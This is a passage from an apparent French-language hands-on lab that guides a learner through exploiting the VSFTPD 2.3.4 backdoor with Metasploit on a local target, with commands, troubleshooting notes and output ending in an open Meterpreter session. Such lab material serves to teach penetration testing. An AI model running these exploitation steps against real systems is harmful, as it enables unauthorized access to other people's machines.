Obtenir un accès initial
Dans cette étape, vous allez accéder au système cible en exploitant une porte dérobée (backdoor) dans le service VSFTPD 2.3.4. Cela vous permettra d'obtenir une session Meterpreter pour la post-exploitation.
Tout d'abord, lancez la console du framework Metasploit.
msfconsole -q
Une fois Metasploit lancé, sélectionnez l'exploit pour la porte dérobée VSFTPD 2.3.4.
use exploit/unix/ftp/vsftpd_234_backdoor
Configurez maintenant les options de la cible et du payload. Comme le service s'exécute sur la même machine, nous utilisons l'adresse IP de bouclage (loopback). Le payload par défaut nécessite LHOST et peut échouer avec l'erreur "All encoders failed to encode" - définissez l'encodeur pour éviter cela :
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
Enfin, lancez l'exploit.
exploit
DÉPANNAGE : Si vous voyez Msf::OptionValidateError One or more options failed to validate: LHOST, exécutez set LHOST 127.0.0.1. Si vous voyez All encoders failed to encode, exécutez set Encoder generic/none. Puis relancez exploit.
AVERTISSEMENT : La première tentative peut échouer avec le message "Unable to connect to backdoor on 6200/TCP. Cooldown?" ou "Exploit completed, but no session was created." Si cela se produit, exécutez simplement la commande exploit à nouveau ; la deuxième tentative devrait réussir.
Si l'opération réussit, une session Meterpreter sera ouverte (session 1).
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Vous disposez désormais d'une session Meterpreter. Pour revenir à l'invite msf > pour l'étape suivante, appuyez sur Ctrl+Z puis sur y lorsque le système demande "Background session 1?".